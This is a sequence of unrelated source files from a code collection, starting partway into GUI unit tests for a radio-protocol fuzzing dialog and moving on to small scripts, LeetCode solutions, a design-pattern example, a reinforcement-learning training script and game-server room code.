Data Whitening Poly 0x21, Compute and apply CRC16 via X0r,\n # Rest auf False anlegen und setzen\n self.form.ui.tabWidget.setCurrentIndex(1)\n self.form.compare_frame_controller.ui.cbProtoView.setCurrentIndex(1) # Hex\n decoding = Encoding([\"Data Whitening\", settings.DECODING_DATAWHITENING, \"0x9a7d9a7d;0x21\"])\n self.form.compare_frame_controller.decodings.append(decoding)\n self.form.compare_frame_controller.ui.cbDecoding.addItem(decoding.name)\n self.form.compare_frame_controller.set_decoding(decoding)\n\n # Serial Part 1: Bits 207-226 (Dezimal: 91412) (20 Bits)\n self.form.compare_frame_controller.add_protocol_label(start=206, end=225, messagenr=0, proto_view=0,\n edit_label_name=False)\n\n # Zeros: Bits 227-244 (18 Bits)\n self.form.compare_frame_controller.add_protocol_label(start=226, end=243, messagenr=0, proto_view=0,\n edit_label_name=False)\n\n # Serial Part 2: Bit 245 - 264 (Dezimal: 1034678) (20 Bits)\n self.form.compare_frame_controller.add_protocol_label(start=244, end=263, messagenr=0, proto_view=0,\n edit_label_name=False)\n\n self.form.ui.tabWidget.setCurrentIndex(2)\n item = self.gframe.tree_model.rootItem.children[0].children[0]\n index = self.gframe.tree_model.createIndex(0, 0, item)\n rect = self.gframe.ui.treeProtocols.visualRect(index)\n\n self.assertEqual(len(self.gframe.ui.treeProtocols.selectedIndexes()), 0)\n QTest.mousePress(self.gframe.ui.treeProtocols.viewport(), Qt.LeftButton, pos = rect.center())\n self.assertEqual(self.gframe.ui.treeProtocols.selectedIndexes()[0], index)\n mimedata = self.gframe.tree_model.mimeData(self.gframe.ui.treeProtocols.selectedIndexes())\n self.gframe.table_model.dropMimeData(mimedata, 1, -1, -1, self.gframe.table_model.createIndex(0, 0))\n\n self.assertEqual(self.gframe.table_model.row_count, 1)\n self.assertEqual(len(self.gframe.table_model.protocol.protocol_labels), 3)\n\n self.dialog = FuzzingDialog(protocol=self.gframe.table_model.protocol, label_index=0, msg_index=0,\n 
proto_view=0, parent=self.gframe)\n self.dialog.finished.connect(self.gframe.refresh_label_list)\n self.dialog.finished.connect(self.gframe.refresh_table)\n self.dialog.finished.connect(self.gframe.set_fuzzing_ui_status)\n\n if self.SHOW:\n self.dialog.show()\n\n def test_fuzz_label_bit(self):\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"00010110010100010100\") # Serial Part 1\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(1)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"000000000000000000\") # Zeros\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(2)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"11111100100110110110\") # Serial Part 2\n\n def test_fuzz_label_hex(self):\n for message in self.gframe.table_model.protocol.messages:\n message.align_labels = False\n\n self.dialog.proto_view = 1\n\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"c5945\") # Serial Part 1\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(1)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"00000\") # Zeros\n self.dialog.ui.comboBoxFuzzingLabel.setCurrentIndex(2)\n self.assertEqual(self.dialog.message_data[self.dialog.current_label_start:self.dialog.current_label_end],\n \"fc9b6\") # Serial Part 2\n\n def test_add_remove_fuzzing_data(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.assertEqual(self.dialog.fuzz_table_model.rowCount(), 1)\n self.dialog.ui.btnAddRow.click()\n self.assertEqual(self.dialog.fuzz_table_model.data[1], \"00010110010100010101\") # serial part 1\n self.dialog.ui.btnAddRow.click()\n self.assertEqual(self.dialog.fuzz_table_model.data[2], \"00010110010100010110\") # serial part 1\n self.assertEqual(self.dialog.fuzz_table_model.rowCount(), 3)\n self.dialog.ui.btnDelRow.click()\n self.dialog.ui.btnDelRow.click()\n self.assertEqual(self.dialog.fuzz_table_model.rowCount(), 1)\n\n def test_adding_fuzzing_range(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.dialog.ui.sBAddRangeStart.setValue(10)\n self.dialog.ui.sBAddRangeEnd.setValue(100)\n self.dialog.ui.sBAddRangeStep.setValue(20)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(6, self.dialog.fuzz_table_model.rowCount())\n\n def test_adding_fuzzing_boundaries(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.dialog.ui.spinBoxLowerBound.setValue(2)\n self.dialog.ui.spinBoxUpperBound.setValue(200)\n self.dialog.ui.spinBoxBoundaryNumber.setValue(2)\n self.dialog.ui.comboBoxStrategy.setCurrentIndex(1)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(5, self.dialog.fuzz_table_model.rowCount())\n\n def test_adding_fuzzing_random_values(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n self.dialog.ui.spinBoxNumberRandom.setValue(10)\n self.dialog.ui.comboBoxStrategy.setCurrentIndex(2)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(11, self.dialog.fuzz_table_model.rowCount())\n\n def test_remove_duplicates(self):\n self.assertEqual(self.dialog.fuzz_table_model.data[0], \"00010110010100010100\") # serial part 1\n 
self.dialog.ui.sBAddRangeStart.setValue(10)\n self.dialog.ui.sBAddRangeEnd.setValue(50)\n self.dialog.ui.sBAddRangeStep.setValue(5)\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(10, self.dialog.fuzz_table_model.rowCount())\n self.dialog.ui.btnAddFuzzingValues.click()\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(28, self.dialog.fuzz_table_model.rowCount())\n self.dialog.ui.chkBRemoveDuplicates.click()\n self.assertEqual(10, self.dialog.fuzz_table_model.rowCount())\n self.dialog.ui.btnAddFuzzingValues.click()\n self.assertEqual(10, self.dialog.fuzz_table_model.rowCount())\n","repo_name":"jopohl/urh","sub_path":"tests/test_fuzzing_dialog.py","file_name":"test_fuzzing_dialog.py","file_ext":"py","file_size_in_byte":8330,"program_lang":"python","lang":"en","doc_type":"code","stars":9873,"dataset":"github-code","pt":"96"} +{"seq_id":"40930687560","text":"davi=str(input('primeiro aluno:'))\ngledson=str(input('segundo aluno:'))\nsilva=str(input('terceiro aluno:'))\nbene=str(input('quarto aluno:'))\n\nlista=[davi, gledson, silva, bene]\n\nimport random\n\ns=random.choice(lista)\nprint(f'o aluno escolhido foi {s}')","repo_name":"davigledson/Curso-de-Python-do-CursoemVideo","sub_path":"CursoEmVídeo/Mundo01/03-Utilizando Módulos/desafio019 - Sorteando um item na lista.py","file_name":"desafio019 - Sorteando um item na lista.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"gl","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"41785539925","text":"import csv\nimport datetime\n\nfrom app import models\nfrom app.database import SessionLocal, engine\n\ndb = SessionLocal()\n\nmodels.Base.metadata.create_all(bind=engine)\n\nwith open(\"sars_2003_complete_dataset_clean.csv\", \"r\") as f:\n csv_reader = csv.DictReader(f)\n\n for row in csv_reader:\n db_record = models.Record(\n date=datetime.datetime.strptime(row[\"date\"], \"%Y-%m-%d\"),\n country=row[\"country\"],\n cases=row[\"cases\"],\n deaths=row[\"deaths\"],\n recoveries=row[\"recoveries\"],\n )\n db.add(db_record)\n\n db.commit()\n\ndb.close()\n","repo_name":"edkrueger/sars-fastapi","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"96"} +{"seq_id":"14301067535","text":"'''\nhttps://leetcode.com/problems/continuous-subarray-sum/\n2021/10\n904 ms\n'''\n\nclass Solution:\n def checkSubarraySum(self, nums: List[int], k: int) -> bool:\n summ, remainders = 0, {0: -1}\n for i in range(0, len(nums)):\n summ = (summ + nums[i]) % k\n if summ in remainders:\n if i - remainders[summ] > 1:\n return True\n else:\n remainders[summ] = i\n return False\n","repo_name":"zvant/LeetCodeSolutions","sub_path":"0523.continuous_subarray_sum_M.py","file_name":"0523.continuous_subarray_sum_M.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"443147864","text":"class Solution:\n def containsDuplicate(self, nums) -> bool:\n caching = set()\n\n for value in nums:\n if value not in caching:\n caching.add(value)\n else:\n return True\n\n return False\n\n #TC: O(N)\n #SC: O(N)","repo_name":"LuanGolivr/AlgorithmProblems","sub_path":"LeetCodeProblems/python/217_ContainsDuplicate.py","file_name":"217_ContainsDuplicate.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} 
+{"seq_id":"32210616735","text":"#include\r\n\r\nt = int(input())\r\n\r\nfor c in range(0, t):\r\n n = input().split()\r\n\r\n x, y = int(n[0]), int(n[1])\r\n\r\n if y == 0:\r\n print('divisao impossivel')\r\n else:\r\n print('%.1f' %(x / y))","repo_name":"LinconRozendo/URI","sub_path":"1116.py","file_name":"1116.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73090757435","text":"import datetime\nimport re\n\nimport utils\nfrom movie import Movie\n\n# black words in file names\nblackwords = [\n # video type\n 'DVDRip', 'HD-DVD', 'HDDVD', 'HDDVDRip', 'BluRay', 'Blu-ray', 'BDRip', 'BRRip',\n 'HDRip', 'DVD', 'DVDivX', 'HDTV', 'DVB', 'DVBRip', 'PDTV', 'WEBRip', 'DVDSCR',\n 'Screener', 'VHS', 'VIDEO_TS',\n # screen\n '720p', '720',\n # video codec\n 'XviD', 'DivX', 'x264', 'h264', 'Rv10',\n # audio codec\n 'AC3', 'DTS', 'He-AAC', 'AAC-He', 'AAC', '5.1',\n # ripper teams\n 'ESiR', 'WAF', 'SEPTiC', '[XCT]', 'iNT', 'PUKKA', 'CHD', 'ViTE', 'TLF',\n 'DEiTY', 'FLAiTE', 'MDX', 'GM4F', 'DVL', 'SVD', 'iLUMiNADOS',\n 'UnSeeN', 'aXXo', 'KLAXXON', 'NoTV', 'ZeaL', 'LOL'\n]\n\n\ndef guess_info(title):\n \"\"\"\n given a title, tries to guess as much information as possible.\n\n guessed information:\n title, year, language, part\n \"\"\"\n\n # create info dictionary\n info = dict()\n # guess year\n title, year = guess_year_(title)\n if year != None:\n info.update({Movie.YEAR: year})\n # guess language\n title, language = guess_language_(title)\n if language != None:\n info.update({Movie.LANGUAGE: language})\n # guess part\n title, part = guess_part_(title)\n if part != None:\n info.update({Movie.PART: part})\n # guess subtitles\n title, subtitles = guess_subtitles_(title)\n if subtitles != None:\n info.update({Movie.SUBTITLES: subtitles})\n # clean title\n title = clean_title_(title)\n info.update({Movie.TITLE: title})\n # return guessed information\n return info\n\n\ndef guess_year_(title):\n \"\"\"\n looks for year patterns, and return found year\n\n note this only looks for valid production years, that is between 1920\n and now + 5 years, so for instance 2000 would be returned as a valid\n year but 1492 would not\n \"\"\"\n\n year = None\n # search for year pattern (4 consequent digit)\n match = re.search(r'[0-9]{4}', title)\n # if found, check if year is between 1920 and now + 5 years\n if match \\\n and 1920 < int(match.group(0)) < datetime.date.today().year + 5:\n year = match.group(0)\n # remove year from title\n title = title[:match.start()] + title[match.end():]\n return title, year\n\n\ndef guess_language_(title):\n \"\"\"\n guess movie language, looking for ISO language representation in title\n \"\"\"\n\n language = None\n match = re.search(r'\\b([a-zA-Z]{3})\\b', title)\n if match:\n # get corresponding language, given 3-letters ISO language code found\n language = utils.alpha3_to_language(match.group(0))\n # language detected\n if language != None:\n # remove language from title\n title = title[:match.start()] + title[match.end():]\n return title, language\n\n\ndef guess_subtitles_(title):\n \"\"\"\n guess subtitles subtitles, looking for ISO subtitles representation in title\n \"\"\"\n\n subtitles = None\n match = re.search(r'(?:[^a-zA-Z0-9]sub )([a-zA-Z]{3})(?:[^a-zA-Z0-9])', title)\n if match:\n # get corresponding subtitles, given 3-letters ISO subtitles code found\n subtitles = utils.alpha3_to_language(match.group(1))\n # subtitles detected\n if subtitles != None:\n # remove subtitles 
from title\n title = title[:match.start() + 1] + title[match.end() - 1:]\n return title, subtitles\n\n\ndef guess_part_(title):\n \"\"\"\n guess movie part, e.g. CD1 -> 1\n \"\"\"\n\n part = None\n # search part, which can be like, for example, disk1 or disk 1\n match = re.search(r'(?:cd|disk|part[ ]?)(\\d)', title, re.IGNORECASE)\n if match:\n # get part number\n part = match.group(1)\n # remove part from title\n title = title[:match.start()] + title[match.end():]\n return title, part\n\n\ndef clean_title_(title):\n # remove everything inside parenthesis\n title = re.sub('[([{].*?[)\\]}]', ' ', title)\n # replace dots, underscores and dashes with spaces\n title = re.sub(r'[._-]', ' ', title)\n stitle = title.split()\n title = []\n # loop on name\n # keep only words which are not black words\n for word in stitle:\n is_not_a_blackword = True\n for blackword in blackwords:\n if word.lower() == blackword.lower():\n is_not_a_blackword = False\n break\n if is_not_a_blackword:\n title.append(word)\n else:\n break\n title = ' '.join(title)\n return title\n","repo_name":"albemala/almoviesrenamer","sub_path":"src/guess.py","file_name":"guess.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"96"} +{"seq_id":"72666843516","text":"\"\"\"\nCOMMAND DESIGN PATTERN\n=======================\n\nCommand deisgn pattern is another design pattern that deal withs \nimplementations of tracing the changes, do and undo operations.\n\nHere in the example below, we have combined this idea with COMPOSITE DESIGN PATTERN.\n\nWe have below classes:\n1. Bank Account : Responsible for creating bank account for a Customer\n2. Abstract class Command : This basically is meant to invoke functionality of the COMMAND\n design pattern.\n 1. INVOKE : Execute what ever BankAccount operation is like DEPOSIT / WITHDRAW\n 2. UNDO : Undoe the last operation.\n3. BankAccountCommand : This helps in creating Bank account for customers and associates\n command pattern functionality by inheriting the above abstract class.\n4. CompositeBankAccountCommand : This class converts / implements composite pattern.\n Takes in list of accounts (BankAccountCommand) and applies functionality for group /\n single account\n5. WithdrawTransferCommand: Takes in the CompositeBankAccountCommand as input with from and\n to account and the amount to transfer. 
Then executes the intended functionality.\n\n\nLet's see the implementation as below.\n\n\"\"\"\n\nfrom abc import ABC\nfrom enum import Enum\nimport unittest\n\n\nclass BankAccount:\n \"\"\"\n Class for creating the bank account for any customer\n \"\"\"\n\n OVERDRAFTLIMIT = -500\n\n def __init__(self, name, amount) -> None:\n \"\"\"\n Init a bank account for cusotmer\n \"\"\"\n self.name = name\n self.amount = amount\n\n def deposit(self, amount):\n \"\"\"\n Given the amount, increment the amount for the Bank account holder\n\n Args:\n amount (int): Amount to deposite in the account\n\n Return:\n None\n \"\"\"\n self.amount += amount\n\n def withdraw(self, amount):\n \"\"\"\n Given the amount, decrement the amount for the Bank account holder\n\n Args:\n amount (int): Amount to withdraw from the account\n\n Return:\n bool: True if can withdraw else False\n \"\"\"\n if self.amount - amount >= BankAccount.OVERDRAFTLIMIT:\n self.amount -= amount\n return True\n return False\n\n def __str__(self) -> str:\n \"\"\"\n String representation of the object\n \"\"\"\n return f'AC Name {self.name}, balance : {self.amount}'\n\n\nclass Command(ABC):\n \"\"\"\n Abstract class Command : This basically is meant to invoke functionality of the COMMAND\n design pattern.\n 1. INVOKE : Execute what ever BankAccount operation is like DEPOSIT / WITHDRAW\n 2. UNDO : Undoe the last operation.\n \"\"\"\n\n def __init__(self) -> None:\n self.success = False\n\n def invoke(self):\n pass\n\n def undo(self):\n pass\n\nclass BankAccountCommand(Command):\n \"\"\"\n BankAccountCommand : This helps in creating Bank account for customers\n and associates command pattern functionality by inheriting the above\n abstract class.\n \"\"\"\n\n class Action(Enum):\n DEPOSIT = 0\n WITHDRAW = 1\n\n def __init__(self, account, action, amount) -> None:\n super().__init__()\n self.account = account\n self.action = action\n self.amount = amount\n\n def invoke(self):\n \"\"\"\n Depending on the action to take, calls respective action for the\n account.\n \"\"\"\n if self.action == self.Action.WITHDRAW:\n self.success = self.account.withdraw(self.amount)\n\n elif self.action == self.Action.DEPOSIT:\n self.account.deposit(self.amount)\n self.success = True\n\n def undo(self):\n \"\"\"\n Does the polar opposite of the last action\n \"\"\"\n if self.action == self.Action.WITHDRAW:\n self.account.deposit(self.amount)\n\n elif self.action == self.Action.DEPOSIT:\n self.account.withdraw(self.amount)\n\n\nif __name__ == '__main__':\n ba1 = BankAccount(\"Amitabh\", 0)\n ba2 = BankAccount(\"Shweta\", 0)\n\n print(f'BA1 : {ba1}\\nBA2 : {ba2}')\n\n bac1 = BankAccountCommand(ba1, BankAccountCommand.Action.DEPOSIT, 500)\n bac2 = BankAccountCommand(ba2, BankAccountCommand.Action.DEPOSIT, 1000)\n\n bac1.invoke()\n bac2.invoke()\n print(f'BA1 : {ba1}\\nBA2 : {ba2}')\n\n bac1.undo()\n bac2.undo()\n print(f'BA1 : {ba1}\\nBA2 : {ba2}')\n\nOUTPUT = r\"\"\"\nBA1 : AC Name Amitabh, balance : 0\nBA2 : AC Name Shweta, balance : 0\nBA1 : AC Name Amitabh, balance : 500\nBA2 : AC Name Shweta, balance : 1000\nBA1 : AC Name Amitabh, balance : 0\nBA2 : AC Name Shweta, balance : 0\n\"\"\"\n","repo_name":"Amitabh1989/Design-Patterns-with-Python","sub_path":"_13_Command_Design_Pattern/_01_command_basic.py","file_name":"_01_command_basic.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"23093267877","text":"import os\nimport logging\n\nfrom stable_baselines3.ppo.ppo 
import PPO\nfrom stable_baselines3.common.vec_env.subproc_vec_env import SubprocVecEnv\nfrom stable_baselines3.common.vec_env.vec_monitor import VecMonitor\nfrom bandit.env import make_env\n\nfrom bandit.model import CustomCombinedExtractor\n\n\ndef main(args):\n \"\"\"\n Example to set a training process with Stable Baselines 3\n Loads a scene and starts the training process for a navigation task with images using PPO\n Saves the checkpoint and loads it again\n \"\"\"\n num_environments = 8\n\n # Multiprocess\n env = SubprocVecEnv([make_env(i) for i in range(num_environments)])\n env = VecMonitor(env)\n\n # Obtain the arguments/parameters for the policy and create the PPO model\n save_dir = \"experiments\"\n experiment_name = args.name\n log_dir = os.path.join(save_dir, experiment_name, \"log\")\n checkpoints_dir = os.path.join(save_dir, experiment_name, \"checkpoints\")\n\n os.makedirs(log_dir, exist_ok=True)\n os.makedirs(checkpoints_dir, exist_ok=True)\n\n policy_kwargs = dict(\n features_extractor_class=CustomCombinedExtractor,\n )\n\n model = PPO(\n \"MultiInputPolicy\",\n env,\n verbose=1,\n learning_rate=1e-5, # This is key\n tensorboard_log=log_dir,\n policy_kwargs=policy_kwargs,\n )\n print(model.policy)\n\n # Train the model for the given number of steps\n total_timesteps = 1000\n for i in range(100):\n model.learn(total_timesteps, reset_num_timesteps=False)\n # Save the trained model and delete it\n model.save(os.path.join(checkpoints_dir, f\"ckpt-{i*total_timesteps}\"))\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--name\",\n \"-n\",\n default=\"test\",\n help=\"name to save experiment under\",\n )\n args = parser.parse_args()\n logging.basicConfig(level=logging.INFO)\n main(args)\n","repo_name":"mjlbach/bandits-sb3","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"44603844802","text":"\"\"\"\nRoom instance\nAuthor: Alex (TheAmazingAussie)\n\"\"\"\n\nimport game\nimport asyncoro\nfrom database import database_access as dao\nfrom managers.room.room_data import RoomData\nfrom managers.room.room_tasks import RoomTasks\nfrom managers.room.room_mapping import RoomMapping\nfrom managers.clients.session import Session\n\nfrom communication.messages.outgoing.room.RoomModelMessageComposer import *\nfrom communication.messages.outgoing.room.RoomRatingMessageComposer import *\nfrom communication.messages.outgoing.room.RoomSpacesMessageComposer import *\nfrom communication.messages.outgoing.room.RightsLevelMessageComposer import *\nfrom communication.messages.outgoing.room.NoRightsMessageComposer import *\nfrom communication.messages.outgoing.room.YouAreOwnerComposer import *\nfrom communication.messages.outgoing.room.PrepareRoomMessageComposer import *\nfrom communication.messages.outgoing.room.HotelViewMessageComposer import *\nfrom communication.messages.outgoing.room.RoomDataMessageComposer import *\nfrom communication.messages.outgoing.room.heightmap.FloorMapMessageComposer import *\nfrom communication.messages.outgoing.room.heightmap.HeightMapMessageComposer import *\n\nfrom communication.messages.outgoing.room.user.RoomOwnerRightsComposer import *\nfrom communication.messages.outgoing.room.user.UserStatusMessageComposer import *\nfrom communication.messages.outgoing.room.user.UserDisplayMessageComposer import *\nfrom 
communication.messages.outgoing.room.user.RemoveUserMessageComposer import *\n\n\nclass Room:\n def __init__(self):\n self.disposed = False\n self.data = RoomData()\n self.virtual_counter = -1\n self.entities = []\n self.cycle = None\n self.room_tasks = RoomTasks(self)\n self.room_mapping = RoomMapping(self)\n\n def init_features(self):\n \"\"\"\n Load features of the room, eg thread for walking\n :return:\n \"\"\"\n\n print (\"topkappa\")\n\n # Fill map with points which aren't availiable\n self.room_mapping.regenerate_collision_map()\n\n # Start thread for room tasks\n self.cycle = asyncoro.Coro(self.room_tasks.start_cycle)\n\n def has_rights(self, user_id, only_owner_check):\n\n return self.data.owner_id == user_id\n\n\n def load_room(self, session):\n \"\"\"\n Load room information for player\n :param session: the player entering room\n :return:\n \"\"\"\n\n room_user = session.room_user\n\n # Leave previous room if the user was already in a different room\n #if room_user.room is not None:\n # room_user.room.leave_room(session, False)\n\n room_user.room = self\n\n room_user.is_loading_room = True\n room_user.statuses.clear()\n\n # Initalise room loading\n session.send(RoomModelMessageComposer(self.get_model().name, self.data.id))\n session.send(RoomRatingMessageComposer(self.data.score))\n\n floor_data = int(self.data.floor)\n wall_data = int(self.data.wall)\n\n # Floor design\n if floor_data > 0:\n session.send(RoomSpacesMessageComposer(\"floor\", self.data.floor))\n\n # Wall design\n if wall_data > 0:\n session.send(RoomSpacesMessageComposer(\"wall\", self.data.wall))\n\n # Landscape design\n session.send(RoomSpacesMessageComposer(\"landscape\", self.data.landscape))\n\n # Send rights\n if self.has_rights(session.details.id, True):\n\n session.room_user.statuses[\"flatctrl\"] = \"useradmin\"\n session.send(YouAreOwnerComposer())\n session.send(RightsLevelMessageComposer(4))\n\n elif self.has_rights(session.details.id, False):\n\n session.room_user.statuses[\"flatctrl\"] = \"1\"\n session.send(RightsLevelMessageComposer(1))\n else:\n session.send(NoRightsMessageComposer())\n\n session.send(PrepareRoomMessageComposer(self.data.id))\n\n def load_heightmap(self, session):\n \"\"\"\n Load all heightmap data, walls and furniture items\n :param session: the player to send the data to\n :return: None\n \"\"\"\n\n session.send(HeightMapMessageComposer(self, self.get_model().map_size_x, self.get_model().map_size_y))\n session.send(FloorMapMessageComposer(self))\n\n room_user = session.room_user\n room_user.virtual_id = self.get_virtual_id()\n\n # Finished loading room\n room_user.is_loading_room = False\n\n # Set position shit\n room_user.position = self.get_model().get_door_point()\n room_user.set_rotation(self.get_model().door_rotation, True, False)\n\n # Display self\n self.send(UserDisplayMessageComposer([session]))\n self.send(UserStatusMessageComposer([session]))\n\n # Add user\n self.data.users_now += 1\n self.entities.append(session)\n\n # Load features if no one was in room\n if len(self.get_players()) == 1:\n self.init_features()\n\n # Display users for client\n session.send(UserDisplayMessageComposer(self.entities))\n session.send(UserStatusMessageComposer(self.entities))\n\n # Normal has rights for general users\n is_owner = self.has_rights(session.details.id, True)\n session.send(RoomOwnerRightsComposer(self.data.id, is_owner))\n\n # Send room info... 
again\n #session.send(RoomDataMessageComposer(self, session, True, True))\n\n def leave_room(self, session, hotel_view, dispose=True):\n \"\"\"\n Kick user from room, will lower room population\n :param session: player to leave room\n :param hotel_view: optional to send them to hotel view\n :return:\n \"\"\"\n if hotel_view:\n session.send(HotelViewMessageComposer())\n\n if self.entities is not None:\n if session in self.entities:\n self.data.users_now -= 1\n self.entities.remove(session)\n\n # Remove user from room\n if len(self.get_players()) > 0:\n self.send(RemoveUserMessageComposer(session.room_user.virtual_id))\n\n room_user = session.room_user\n room_user.stop_walking(False)\n room_user.reset()\n\n if dispose:\n self.dispose()\n\n def get_virtual_id(self):\n \"\"\"\n Virtual room user identification\n :return: None\n \"\"\"\n self.virtual_counter += 1\n return self.virtual_counter\n\n def send(self, message):\n \"\"\"\n Sends room message to all players in room\n :param message: the message, will be passed through message encoder\n :return: None\n \"\"\"\n for entity in self.get_players():\n entity.send(message)\n\n def get_model(self):\n \"\"\"\n Returns the room model instance for this room instance\n :return: room_model.py python module\n \"\"\"\n return dao.room_dao.room_models[self.data.model]\n\n def get_players(self):\n \"\"\"\n Get all players currently in room\n :return: array of connected sessions\n \"\"\"\n\n return [player for player in self.entities if type(player) == Session]\n\n def in_room(self, entity_id):\n \"\"\"\n Returns true if the entity is in a room with the given id\n :param entity_id: the unique id for the entity, from the database\n :return:\n \"\"\"\n\n return len([entity for entity in self.entities if entity.details.id == entity_id]) > 0\n\n def dispose(self, force_disposal=False):\n \"\"\"\n Dispose all data\n :param force_disposal:\n :return:\n \"\"\"\n if self.disposed:\n return\n\n\n # Force disposal of all data, kick users when user deletes room\n if force_disposal:\n\n self.data.dispose()\n del self.data\n\n # Call method to erase data that share common dispose calls\n self.__reset_state()\n self.__erase()\n\n if len(self.get_players()) == 0:\n\n # If there's no users, then them we reset the state of the room for items to be loaded again\n # amongst other things\n self.__reset_state()\n\n # Delete from room collection if owner goes offline and there's no more users in the room\n if game.session_manager.find_by_id(self.data.owner_id) is None and self.data.type == 0:\n\n # Call method to erase data that share common dispose calls\n self.__erase()\n\n def __reset_state(self):\n \"\"\"\n Reset all states, reset virtual id, clear furniture, AI, pets, etc\n :return:\n \"\"\"\n\n if self.disposed:\n return\n\n self.virtual_counter = -1\n self.room_mapping.dispose()\n\n # Terminate room cycle\n if self.cycle is not None:\n self.cycle.terminate()\n\n return\n\n def __erase(self):\n \"\"\"\n This method is called when both dispose types share same data which needs to be removed\n :return:\n \"\"\"\n\n print (\"[UNLOAD] Room with id (\" + str(self.data.id) + \") is disposed\")\n\n game.room_manager.rooms.pop(self.data.id, None)\n\n self.room_tasks.dispose()\n self.entities.clear()\n\n del self.room_tasks\n del self.entities\n del self.room_mapping\n del self.data\n\n self.disposed = 
True\n\n\n\n\n","repo_name":"Quackster/Icarus-Python","sub_path":"managers/room/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":9323,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72542348156","text":"from dataclasses import dataclass\nfrom os import environ\nfrom typing import List, Optional\nfrom result import Result\nfrom src.domain.dip_client_error import DIPClientError\nfrom src.domain.hardware_video_message import COMMON_INCOMING_VIDEO_MESSAGE, COMMON_OUTGOING_VIDEO_MESSAGE, \\\n HardwareVideoMessage, InternalStartLifecycle, InternalEndLifecycle\nfrom src.domain.monitor_message import log_monitor_message\nfrom src.engine.engine import Engine\nfrom src.engine.engine_auth import EngineAuth\nfrom src.engine.engine_lifecycle import EngineLifecycle\nfrom src.engine.engine_ping import EnginePing\nfrom src.domain.hardware_video_event import COMMON_ENGINE_EVENT, log_event\nfrom src.engine.monitor.minos.engine_monitor_minos_app import EngineMonitorMinOSApp\nfrom src.engine.monitor.minos.engine_monitor_minos_state import EngineMonitorMinOSState\nfrom src.engine.monitor.minos.minos_suite import MinOSSuite\nfrom src.util import log\n\nMESSAGE_LOGGER = log.timed_named_logger(\"incoming_engine\")\nEVENT_LOGGER = log.timed_named_logger(\"event\")\n\n\n@dataclass\nclass EngineMonitorMinOS(Engine[\n COMMON_INCOMING_VIDEO_MESSAGE,\n COMMON_OUTGOING_VIDEO_MESSAGE,\n EngineMonitorMinOSState,\n COMMON_ENGINE_EVENT,\n DIPClientError\n]):\n engine_lifecycle: EngineLifecycle\n engine_ping: EnginePing\n engine_minos_app: EngineMonitorMinOSApp\n engine_auth: EngineAuth\n\n async def start(self):\n await self.state.base.incoming_message_queue.put(InternalStartLifecycle())\n\n async def kill(self, reason: Optional[DIPClientError]):\n await self.state.base.incoming_message_queue.put(InternalEndLifecycle(reason))\n\n async def pre_process_message(self, previous_state: EngineMonitorMinOSState, message: HardwareVideoMessage):\n log_level = environ.get('LOG_LEVEL')\n if log_level is not None and log_level.lower() == \"debug\":\n log_monitor_message(MESSAGE_LOGGER, message)\n\n async def pre_process_event(self, previous_state: EngineMonitorMinOSState, event: COMMON_ENGINE_EVENT):\n log_level = environ.get('LOG_LEVEL')\n if log_level is not None and log_level.lower() == \"debug\":\n log_event(EVENT_LOGGER, event)\n\n def message_project(\n self,\n previous_state: EngineMonitorMinOSState,\n message: COMMON_INCOMING_VIDEO_MESSAGE\n ) -> Result[List[COMMON_ENGINE_EVENT], DIPClientError]:\n return self.multi_message_project([\n self.engine_lifecycle.handle_message,\n self.engine_minos_app.handle_message,\n self.engine_auth.handle_message,\n ], previous_state, message)\n\n def state_project(\n self,\n previous_state: EngineMonitorMinOSState,\n event: COMMON_ENGINE_EVENT\n ) -> EngineMonitorMinOSState:\n stream_state = self.engine_minos_app.state_project(previous_state, event)\n return stream_state\n\n async def effect_project(self, previous_state: EngineMonitorMinOSState, event: COMMON_ENGINE_EVENT):\n projections = [\n self.engine_lifecycle.effect_project,\n self.engine_minos_app.effect_project,\n self.engine_ping.effect_project,\n 